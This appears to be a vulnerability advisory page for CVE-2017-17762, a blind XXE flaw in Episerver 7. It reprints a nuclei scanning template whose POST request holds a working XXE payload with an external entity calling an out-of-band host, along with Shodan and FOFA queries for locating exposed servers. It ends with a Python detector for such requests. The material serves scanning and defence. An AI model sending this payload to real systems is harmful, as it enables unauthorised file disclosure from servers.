CVE-2017-17762: Episerver 7 - Blind XML External Entity Injection

Date: 2026-01-08 | Affected software: Episerver 7 | PoC: public

Vulnerability description

Episerver 7 patch 4 and earlier contain an XML external entity (XXE) vulnerability: a crafted DTD in an XML request to util/xmlrpc/Handler.ashx is processed by the server, letting remote attackers read arbitrary files. Exploitation requires sending a malicious XML payload.

PoC code [public]

id: CVE-2017-17762

info:
  name: Episerver 7 - Blind XML External Entity Injection
  author: pussycat0x
  severity: high
  description: |
    Episerver 7 patch 4 and earlier contain an XML external entity (XXE) vulnerability: a crafted DTD in an XML request to util/xmlrpc/Handler.ashx is processed by the server, letting remote attackers read arbitrary files. Exploitation requires sending a malicious XML payload.
  impact: |
    Remote attackers can read sensitive files from the server, leading to information disclosure.
  remediation: |
    Update to the latest version of Episerver or apply security patches that fix XXE vulnerabilities.
  reference:
    - https://gist.github.com/jonaslejon/5f92779848360a1a1e676af0795bd9aa
    - https://kryptera.se/sarbarhet-i-episerver/
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2017-17762
    cwe-id: CWE-611
    epss-score: 0.1358
    epss-percentile: 0.93996
    cpe: cpe:2.3:a:episerver:episerver:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: episerver
    product: episerver
    shodan-query:
      - http.html:"episerver"
      - cpe:"cpe:2.3:a:episerver:episerver"
      - http.html:"epihash"
    fofa-query:
      - body="episerver"
      - body="epihash"
  tags: cve,cve2017,xxe,oast,episerver,oob

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /util/xmlrpc/Handler.ashx HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "EPiServer")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /util/xmlrpc/Handler.ashx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml
        Accept: */*

        <?xml version="1.0" encoding="UTF-8"?>
        <!DOCTYPE methodCall [
          <!ENTITY % xxe SYSTEM "http://{{interactsh-url}}">
          %xxe;
        ]>
        <methodCall>
          <methodName>system.listMethods</methodName>
          <params></params>
        </methodCall>

    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol,'dns')"
          - 'status_code == 200 || status_code == 500'
        condition: and
# digest: 4a0a00473045022100cac9e6a2c50dedd113cb26eff1d1e8f0c4c0b261bd13fcf20a11b76f630ae0a402206de746e739aa440217d82c9a8d4b706e3508c304ebf90fe766270866867e8a6e:922c64590222798bb761d5b6d8e72950
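The template's second request carries a DOCTYPE with a parameter entity pointing at an external URL, which is exactly what a detection rule in front of Handler.ashx should look for. The following is an added example (not part of this page or the nuclei project): a check over captured XML-RPC request bodies that flags DTD external entity declarations and parameter entity references; the sample bodies and the callback hostname are constructed placeholders.

```python
import re

# Constructed samples: a benign XML-RPC call and the DTD-carrying request shape
# shown in the template above (callback host replaced by a placeholder).
BENIGN_REQUEST = """<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
  <methodName>system.listMethods</methodName>
  <params></params>
</methodCall>"""

XXE_REQUEST = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE methodCall [
  <!ENTITY % xxe SYSTEM "http://oast.example.invalid">
  %xxe;
]>
<methodCall>
  <methodName>system.listMethods</methodName>
  <params></params>
</methodCall>"""

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# Entity declaration with an external identifier (SYSTEM or PUBLIC);
# the optional '%' marks a parameter entity, as used in the PoC.
EXT_ENTITY_RE = re.compile(
    r"<!ENTITY\s+(%\s+)?([\w.:-]+)\s+(SYSTEM|PUBLIC)\b", re.IGNORECASE)
# Parameter-entity reference inside the internal subset (e.g. %xxe;)
PE_REF_RE = re.compile(r"%[\w.:-]+;")


def inspect_xml_body(body: str) -> dict:
    """Flag DTD features that a legitimate XML-RPC client never needs."""
    findings = {"doctype": False, "external_entities": [], "param_entity_refs": []}
    if not DOCTYPE_RE.search(body):
        return findings
    findings["doctype"] = True
    # Only the prolog (everything before the root element) can hold a DTD;
    # the internal subset ends at "]>".
    prolog_end = body.find("]>")
    prolog = body[:prolog_end] if prolog_end != -1 else body
    for m in EXT_ENTITY_RE.finditer(prolog):
        kind = "parameter" if m.group(1) else "general"
        findings["external_entities"].append((kind, m.group(2), m.group(3).upper()))
    findings["param_entity_refs"] = PE_REF_RE.findall(prolog)
    return findings


def is_xxe_attempt(body: str) -> bool:
    """True when the request declares a DTD that pulls in an external resource."""
    f = inspect_xml_body(body)
    return f["doctype"] and bool(f["external_entities"] or f["param_entity_refs"])
```

Since XML-RPC calls have no legitimate use for a DTD at all, a stricter deployment can reject any body where `inspect_xml_body(...)["doctype"]` is true.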
